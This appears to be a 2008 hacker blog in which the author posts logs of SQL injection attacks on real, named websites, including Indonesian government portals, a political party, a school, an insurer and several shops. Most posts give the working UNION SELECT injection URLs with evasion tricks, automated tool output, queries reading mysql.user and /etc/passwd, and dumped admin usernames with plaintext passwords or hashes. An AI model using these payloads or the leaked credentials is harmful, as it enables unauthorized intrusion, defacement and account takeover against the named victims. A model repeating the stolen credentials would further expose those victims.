[17]t_subkategori: subkategori_id,kategori_id,subkategori_urut,subkategori_nama,subkategori_isaktif,subkategori_file,subkategori_tinggigbr,subkategori_lebargbr,subkategori_adagbr
[18]tblbtamu: tblbtamu_id,tblbtamu_name,tblbtamu_email,tblbtamu_location,tblbtamu_url,tblbtamu_comment,tblbtamu_tanggal,tblbtamu_waktu,tblbtamu_ip
[19]tblbukutamu: tblbukutamu_id,tblbukutamu_ip,tblbukutamu_induk,tblbukutamu_nama,tblbukutamu_email,tblbukutamu_judul,tblbukutamu_isi,tblbukutamu_isaktif,tblbukutamu_tgljam
[20]tblcdiskusi: tblcdiskusi_id,tbldiskusi_id,tblcdiskusi_name,tblcdiskusi_email,tblcdiskusi_comment,tblcdiskusi_tanggal,tblcdiskusi_waktu
[21]tblcide: tblcide_id,tblide_id,tblcide_name,tblcide_email,tblcide_comment,tblcide_tanggal,tblcide_waktu
[22]tblcontent: tblcontent_id,tblweblayoutmenudetil_id,tblcontent_nama
[23]tbldiskusi: tbldiskusi_id,tbldiskusi_name,tbldiskusi_email,tbldiskusi_location,tbldiskusi_url,tbldiskusi_judul,tbldiskusi_comment,tbldiskusi_tanggal,tbldiskusi_waktu
[24]tblide: tblide_id,tblide_name,tblide_email,tblide_location,tblide_url,tblide_judul,tblide_comment,tblide_tanggal,tblide_waktu
[25]tblinfokecamatan: tblinfokecamatan_id,tblkecamatan_id,tblinfokecamatan_luas,tblinfokecamatan_petaadmin,tblinfokecamatan_jumpenduduk,tblinfokecamatan_kepadatan,tblinfokecamatan_pendapatanperkapita,tblinfokecamatan_potensi,tblinfokecamatan_rencanabangunkembang,tblinfokecamatan_rtmiskin,tblinfokecamatan_tanggal
[26]tblinstansi: tblinstansi_id,tbljnsinstansi_id,tblinstansi_nama
[27]tbljnsinstansi: tbljnsinstansi_id,tbljnsinstansi_nama
[28]tblkecamatan: tblkecamatan_id,tblkecamatan_nama
[29]tblkelompok: tblkelompok_id,tblkelompok_nama,tblkelompok_isaktif
[30]tblkelompoklink: tblkelompoklink_id,tblkelompoklink_nama,tblkelompoklink_url,tblkelompoklink_namafile,tblkelompoklink_isaktif
[31]tblkelompoksub: tblkelompok_id,tblkelompoksub_id,tblkelompoksub_keterangan,tblkelompoksub_namafile,tblkelompoksub_url,tblkelompoksub_isaktif
[32]tblkomentar: tblkomentar_id,tblbtamu_id,tblkomentar_name,tblkomentar_email,tblkomentar_location,tblkomentar_comment,tblkomentar_tanggal,tblkomentar_waktu,tblkomentar_ip
[33]tblkonkomentar: tblkonkomentar_id,tblkontak_id,tblkonkomentar_name,tblkonkomentar_email,tblkonkomentar_location,tblkonkomentar_comment,tblkonkomentar_tanggal,tblkonkomentar_waktu
[34]tblkontak: tblkontak_id,tblkontak_name,tblkontak_email,tblkontak_location,tblkontak_url,tblkontak_comment,tblkontak_tanggal,tblkontak_waktu
[35]tbllappengendalian: tbllappengendalian_id,tblinstansi_id,tbljnsinstansi_id,tbllappengendalian_keuanganjumdana,tbllappengendalian_keuangansasaran,tbllappengendalian_keuangansasaranpersen,tbllappengendalian_keuanganrealisasi,tbllappengendalian_keuanganrealisasipersen,tbllappengendalian_keuanganratos,tbllappengendalian_fisiktimbangsasaran,tbllappengendalian_fisiktimbangrealisasi,tbllappengendalian_fisikratos,tbllappengendalian_kondisibulanawal,tbllappengendalian_kondisibulanakhir,tbllappengendalian_tahunawal,tbllappengendalian_tahunakhir
[36]tblmenu: tblmenu_id,tblmenu_menu,tblmenu_level,tblmenu_induk,tblmenu_isaktif
[37]tblmulmed: tblmulmedinduk_id,tblmulmed_id,tblmulmed_judul,tblmulmed_deskripsi,tblmulmed_kapasitas,tblmulmed_namafile,tblmulmed_tanggal,tblmulmed_istayang
[38]tblmulmedinduk: tblmulmedinduk_id,tblmulmedinduk_kategori,tblmulmedinduk_istayang
[39]tblpengguna: tblpengguna_id,tblpengguna_login,tblpengguna_pass,tblpengguna_nama,tblgroup_id,tblpengguna_isaktif,tblpengguna_to
[40]tblsubcontent: tblsubcontent_id,tblcontent_id,tblsubcontent_nam,tblsubcontent_isi
[41]tblsubdomainlink: tblsubdomainlink_id,tblsubdomainlink_nama,tblsubdomainlink_url,tblsubdomainlink_namafile,tblsubdomainlink_isaktif
[42]tblweblayout: tblweblayout_id,tblweblayout_nama,tblweblayout_tglupdate,tblweblayout_namafile,tblweblayout_isaktif,tblpengguna_id
[43]tblweblayoutkontent: tblweblayoutkontent_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblweblayoutkontent_urut,tblweblayoutkontent_judul,tblweblayoutkontent_isi,tblweblayoutkontent_tglupdate,tblweblayoutkontent_isfile,tblweblayoutkontent_namafile,tblweblayoutkontent_istayang,tblpengguna_id,tblweblayoutkontent_klik
[44]tblweblayoutmenu: tblweblayoutmenu_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_nama,tblweblayoutmenu_urut,tblweblayoutmenu_isaktif,tblpengguna_id
[45]tblweblayoutmenudetil: tblweblayoutmenudetil_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_nama,tblweblayoutmenudetil_urut,tblweblayoutmenudetil_induk,tblweblayoutmenudetil_isaktif,tblweblayoutmenudetil_home,tblweblayoutmenudetil_modetampil,tblpengguna_id,tblweblayoutmenudetil_privileges
[46]tblweblayoutmenudetilfile: tblweblayoutmenudetilfile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblweblayoutmenudetilfile_ket,tblweblayoutmenudetilfile_namafile,tblpengguna_id
[47]tblweblayoutmenudetilpengguna: tblweblayoutmenudetilpengguna_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblpengguna_id
[48]tblweblayoutposisi: tblweblayoutposisi_id,tblweblayout_id,tblweblayoutposisi_urut,tblweblayoutposisi_nama,tblweblayoutposisi_lokasi,tblweblayoutposisi_fileprogram,tblweblayoutposisi_filetemplate,tblweblayoutposisi_isaktif,tblweblayoutposisi_ismenu,tblpengguna_id,tblweblayoutposisi_ishome
[49]tblweblayoutposisifile: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[50]tblweblayoutposisifileprogram: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[51]tblweblayoutposisifilepustaka: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[52]tblweblayoutposisifiletemplate: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[53]userlevelpermissions: userlevelid,tablename,permission
[54]userlevels: userlevelid,userlevelname

[-] [13:34:57]
[-] Total URL Requests 338
[-] Done


[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:43:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost
Version: 5.0.38-Ubuntu_0ubuntu1-log
[+] Dumping data from database "dbportalgunungkidul" Table "tblpengguna"
[+] Column(s) ['tblpengguna_login', 'tblpengguna_pass']
[+] Number of Rows: 3

[0] adminsetmodule:1nk0mgkmodule:
[1] adminentrydata:1nk0mgkdata:
[2] Data Umum:1nk0mgkdatum:1nk0mgkdatum:

[-] [13:43:59]
[-] Total URL Requests 5
[-] Done

Monday, November 10, 2008

[SQLi] http://www.sulut.go.id

5:23 PM Posted by viperfx07 2 comments
Problem: Admin directory found, but it's forbidden...
Admin dir: http://www.sulut.go.id/admin/
Dump:
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]sulut
[1]test

[-] [16:48:42]
[-] Total URL Requests 4
[-] Done

[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:58
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing Tables & Columns from database "sulut"
[+] Number of Tables: 81

[Database]: sulut
[Table: Columns]
[-] [17:13:55]
[-] Total URL Requests 458
[-] Done


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:16:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 4


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:17:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4

[-] [17:17:21]
[-] Total URL Requests 6
[-] Done


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:19:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "user_admin"
[+] Column(s) ['userUserName', 'userPassword']
[+] Number of Rows: 2

[-] [17:20:08]
[-] Total URL Requests 4
[-] Done

Wednesday, October 29, 2008

[SQLi] http://seaedunet.seamolec.org

5:27 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0

[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:19:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,load_file(0x2f6574632f706173737764),2,3,4--

[-] [17:19:55]
[-] Total URL Requests 3
[-] Done


[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:20:33
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 39

[-] [17:24:19]
[-] Total URL Requests 41
[-] Done

Monday, October 27, 2008

Here in Australia...

5:58 PM Posted by viperfx07 No comments
Wow man, every day is a busy day. Moving to another country is not an easy task for me. With the "unhuman" weather, I've already gotten sick these days: sore throat and runny nose.

So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. Here, I can't download as much as I did in Indonesia (poor me). I think Indonesia is better now.

I'll keep updating my blog. So stay tuned...

Wednesday, October 15, 2008

[SQLi] http://sman1-boyolali.com

5:05 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://sman1-boyolali.com/admin/
Admin usr:pwd --> admin:mastar1234
Dump:
[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:40:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community

[Database]: sman1bo_smanbo
[Table: Columns]
[-] [12:42:43]
[-] Total URL Requests 77
[-] Done

[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:44:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sman1bo_smanbo" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 966

-----cut here coz it's too many---

[SQLi] http://www.buturnews.idrap.or.id

3:14 PM Posted by viperfx07 No comments


Tool --> blindext.py v5.0
User login --> buturnews:banda1302 (see the others in the dump)
Dump:
[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t79166_dbbutur"
[+] 10:12:30
[+] Number of Rows: 5

[-] 10:24:56
[-] Total URL Requests 292
[-] Done


[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "t79166_dbbutur" and Table "tuser"
[+] 10:25:33
[+] Number of Rows: 16

---------- cut here because it's too boring -----

[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "t79166_dbbutur" Table "tuser"
[+] Column(s) ['username', 'password']
[+] 10:47:55
[+] Number of Rows: 8

[-] 10:56:34
[-] Total URL Requests 975
[-] Done

[SQLi] http://www.jiwasraya.co.id

2:30 PM Posted by viperfx07 No comments


Admin login page --> http://www.jiwasraya.co.id/admin/
Admin usr:pwd --> admin:ari1007 (see the others in the dump)
Dump:
[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 09:51:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [09:51:14]
[-] Total URL Requests 3
[-] Done

[-] [10:23:30]
[-] Total URL Requests 1736
[-] Done


[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 10:24:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log
[+] Dumping data from database "jiwasraya1" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 5

[0] admin:ari1007:
[1] budi:ari1007:
[2] valent:ari1007:
[3] humas:humas:
[4] fonny:nonaktif:

[-] [10:24:50]
[-] Total URL Requests 9
[-] Done

[SQLi] http://mobile.kompas.com

1:06 AM Posted by viperfx07 No comments
I tried to get the full schema of kompas.com but I'm too tired, and there are too many. If you're so eager to "hack", try to get them all :)

Info:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:59:19
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version: 5.0.22

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,concat(user,0x3a,password),2,3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,load_file(0x2f6574632f706173737764),2,3/*


Dump:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 20:52:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version: 5.0.22
[+] Showing all databases current user has access too!
[+] Number of Databases: 45


Tuesday, October 14, 2008

[SQLi] http://www.gontha.com/

11:10 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://www.gontha.com/admin/
Admin usr:pwd --> sai:saiman
Dump:

[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 18:57:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: persada_gontha
User: persada_visitor@98.131.15.31
Version: 4.1.20-max-log
[+] Dumping data from database "persada_gontha" Table "members"
[+] Column(s) ['username', 'password', 'admin']
[+] Number of Rows: 6

[0] pfg:pfg01:0:
[1] zul:zulbas:0:
[2] sai:saiman:1:
[3] 0:
[4] yanto:hantu:0:0:0:

[-] [18:57:26]
[-] Total URL Requests 8
[-] Done


Some domains that can be defaced because of this exploit:

[SQLi] http://golkar.go.id

5:43 PM Posted by viperfx07 No comments
Tool --> schemafuzz v5.0
Dump:
[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:02
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,load_file(0x2f6574632f706173737764),3--

[-] [13:14:04]
[-] Total URL Requests 3
[-] Done


[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[Database]: golkar_blog_ver2
[Table: Columns]

[Database]: golkar_pusat
[Table: Columns]

[Database]: ibs
[Table: Columns]

[Database]: mysql
[Table: Columns]

[-] [13:24:06]
[-] Total URL Requests 926
[-] Done

[SQLi] http://en.agrimedia.com/

12:57 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://en.agrimedia.com/admin/
Admin usr:pwd --> admin:agri8z3 (see the others in the dump)
Dump:
[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:26:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26

[Database]: usr_web4_1
[Table: Columns]

[-] [20:40:31]
[-] Total URL Requests 313
[-] Done


[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:54:56
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26
[+] Dumping data from database "usr_web4_1" Table "logins"
[+] Column(s) ['user', 'pass']
[+] Number of Rows: 4

[0] admin:agri8z3:
[1] ulrike:casanostra:
[2] marcussefrin:lueneburg:
[3] doreen:wendland:

[-] [20:55:11]
[-] Total URL Requests 6
[-] Done

[SQLi] http://www.theperfusionstore.com/

12:43 AM Posted by viperfx07 No comments


Admin login page --> http://www.theperfusionstore.com/admin/
Admin usr:pwd --> admin:p3rfusion
Dump:
[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:30:50
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log

[Database]: perfusion
[Table: Columns]

[-] [20:39:01]
[-] Total URL Requests 311
[-] Done


[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:40:01
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log
[+] Dumping data from database "perfusion" Table "tblusers"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] admin:85c51eef704f837ab85006998db06448:

[-] [20:40:07]
[-] Total URL Requests 3
[-] Done